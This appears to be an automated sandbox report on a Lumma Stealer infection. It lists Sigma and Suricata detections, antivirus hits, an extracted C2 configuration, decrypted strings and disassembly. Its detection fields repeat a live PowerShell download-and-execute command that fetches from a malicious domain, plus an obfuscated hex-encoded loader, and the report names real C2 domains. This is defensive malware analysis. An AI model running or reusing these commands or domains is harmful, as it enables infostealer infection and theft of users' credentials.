Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B0932627EC99DD59A0B04221337CFAB108C5B82612E53BAF2

Data Obfuscation

Sigma detected: Powershell Download and Execute IEX

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16E

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:25:06.266211+0100	2028371	3	Unknown Traffic	192.168.2.5	49931	104.21.80.1	443	TCP
2024-12-29T09:25:08.457698+0100	2028371	3	Unknown Traffic	192.168.2.5	49936	104.21.80.1	443	TCP
2024-12-29T09:25:11.939596+0100	2028371	3	Unknown Traffic	192.168.2.5	49945	104.21.80.1	443	TCP
2024-12-29T09:25:14.357822+0100	2028371	3	Unknown Traffic	192.168.2.5	49951	104.21.80.1	443	TCP
2024-12-29T09:25:16.688617+0100	2028371	3	Unknown Traffic	192.168.2.5	49957	104.21.80.1	443	TCP
2024-12-29T09:25:19.173275+0100	2028371	3	Unknown Traffic	192.168.2.5	49965	104.21.80.1	443	TCP
2024-12-29T09:25:21.274571+0100	2028371	3	Unknown Traffic	192.168.2.5	49969	104.21.80.1	443	TCP
2024-12-29T09:25:23.555991+0100	2028371	3	Unknown Traffic	192.168.2.5	49975	104.21.80.1	443	TCP
2024-12-29T09:25:26.273390+0100	2028371	3	Unknown Traffic	192.168.2.5	49982	185.161.251.21	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:25:07.120037+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49931	104.21.80.1	443	TCP
2024-12-29T09:25:10.370651+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49936	104.21.80.1	443	TCP
2024-12-29T09:25:24.358688+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49975	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:25:07.120037+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49931	104.21.80.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:25:10.370651+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49936	104.21.80.1	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:25:22.289146+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49969	104.21.80.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cegu.shop/	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txts=Rc	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtZR	Avira URL Cloud: Label: malware
Source: https://cegu.shop/8574262446/ph.txt	Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txt	Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.powershell.exe.4f0000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "crackerdolk.click", "hummskitnj.buzz", "appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "prisonyfork.buzz", "screwamusresz.buzz"], "Build id": "jMw1IE--bigJ"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.8% probability

Sample uses string decryption to hide its real strings

Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: hummskitnj.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: cashfuzysao.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: appliacnesot.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: screwamusresz.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: inherineau.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: scentniej.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: rebuildeso.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: prisonyfork.buzz
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: crackerdolk.click
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: - Screen Resoluton:
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: Workgroup: -
Source: 8.2.powershell.exe.4f0000.0.unpack	String decryptor: jMw1IE--bigJ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00508BD5 CryptUnprotectData,

8_2_00508BD5

Source: unknown	HTTPS traffic detected: 104.21.72.190:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49982 version: TLS 1.2

Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\USERENV.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp ecx	8_2_00529A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	8_2_004F9AD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_00515560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [eax+edx], 0000h	8_2_004FADE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [edx], cx	8_2_00508592
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push ebx	8_2_00508592
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp ecx	8_2_00508592
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, eax	8_2_0052B5B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	8_2_0051B744
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6B77B5E1h	8_2_0052E780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, bx	8_2_00513011
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00524010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	8_2_0052D020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	8_2_0052D020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0050F8F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx+6B6EEEC4h]	8_2_0052D0B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi-0D9327CAh]	8_2_0052D0B0
